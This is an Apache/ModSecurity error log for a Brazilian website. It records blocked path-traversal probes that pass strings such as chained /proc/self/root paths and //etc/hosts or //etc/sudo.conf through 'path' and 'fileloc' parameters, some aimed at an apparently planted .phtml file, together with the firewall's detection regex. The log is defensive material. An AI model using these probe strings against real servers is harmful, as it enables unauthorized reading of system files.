[Thu Mar 19 13:17:38.694150 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:34070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwhohkFeYa1D6dYQnADpgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 13:17:58.193826 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39358] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:18:20.757819 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:18:37.447145 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:56904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwh3f-YZRR_7pZ7nDKeAQAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:18:44.621830 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:19:00.372994 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:52610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwh9AkwaGbbGflqUZDaIgAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 13:19:07.053831 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41130] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:19:32.045955 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:19:55.125782 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42220] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:20:16.992441 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:42448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwiQF_V7PWP6ixUYl7PcwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:20:18.073824 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:20:41.145839 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:20:41.975688 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:50742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwiWda6ubjKNq_cu4ZpkAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 13:21:00.648446 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:39516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwibP-YZRR_7pZ7nDKeSAAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:21:06.053974 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:21:10.919245 2026] [:error] [pid 17653:tid 140411590858496] [client 57.141.18.33:47916] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwidsdf6f5d65gmYZSMAgAAAtI"]
[Thu Mar 19 13:21:11.467490 2026] [:error] [pid 17887:tid 140411582465792] [client 57.141.18.64:47756] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwidwkwaGbbGflqUZDadgAAANM"]
[Thu Mar 19 13:21:13.701697 2026] [:error] [pid 30077:tid 140411548894976] [client 57.141.18.24:47994] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiefu8EFLIOrSqIpu7WgAAAlc"]
[Thu Mar 19 13:21:13.810071 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.41:47998] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiefu8EFLIOrSqIpu7WwAAAkE"]
[Thu Mar 19 13:21:14.053066 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.112:48006] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/motd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwievu8EFLIOrSqIpu7XAAAAlY"]
[Thu Mar 19 13:21:14.764059 2026] [:error] [pid 19093:tid 140411590858496] [client 57.141.18.44:48022] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiel_V7PWP6ixUYl7PjQAAApI"]
[Thu Mar 19 13:21:15.127508 2026] [:error] [pid 30077:tid 140411666392832] [client 57.141.18.61:48036] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwie_u8EFLIOrSqIpu7XQAAAkk"]
[Thu Mar 19 13:21:15.716725 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.81:48050] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwie_-YZRR_7pZ7nDKeSwAAA8c"]
[Thu Mar 19 13:21:15.783348 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.84:48052] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwie-oXxyEfFpUF8f8f1wAAAUU"]
[Thu Mar 19 13:21:16.357049 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.62:48058] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifNa6ubjKNq_cu4ZpoQAAA1E"]
[Thu Mar 19 13:21:16.453001 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.70:48060] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifAbLMZ6AikZjR9VwUgAAAAE"]
[Thu Mar 19 13:21:16.859355 2026] [:error] [pid 17887:tid 140411708356352] [client 57.141.18.31:48068] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifAkwaGbbGflqUZDadwAAAMQ"]
[Thu Mar 19 13:21:17.255562 2026] [:error] [pid 27293:tid 140411674785536] [client 57.141.18.13:48076] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiff-YZRR_7pZ7nDKeTAAAA8g"]
[Thu Mar 19 13:21:17.642356 2026] [:error] [pid 27403:tid 140411666392832] [client 57.141.18.92:48080] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifRkFeYa1D6dYQnAEEgAAAck"]
[Thu Mar 19 13:21:18.424150 2026] [:error] [pid 17887:tid 140411674785536] [client 57.141.18.96:48096] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifgkwaGbbGflqUZDaeQAAAMg"]
[Thu Mar 19 13:21:18.664041 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.82:48100] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifv-YZRR_7pZ7nDKeTQAAA8M"]
[Thu Mar 19 13:21:18.791958 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.116:48112] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwifv-YZRR_7pZ7nDKeTgAAA88"]
[Thu Mar 19 13:21:19.275977 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.53:48118] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwif-oXxyEfFpUF8f8f2gAAAUM"]
[Thu Mar 19 13:21:19.333126 2026] [:error] [pid 26799:tid 140411699963648] [client 57.141.18.78:48120] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwif9a6ubjKNq_cu4ZpowAAA0U"]
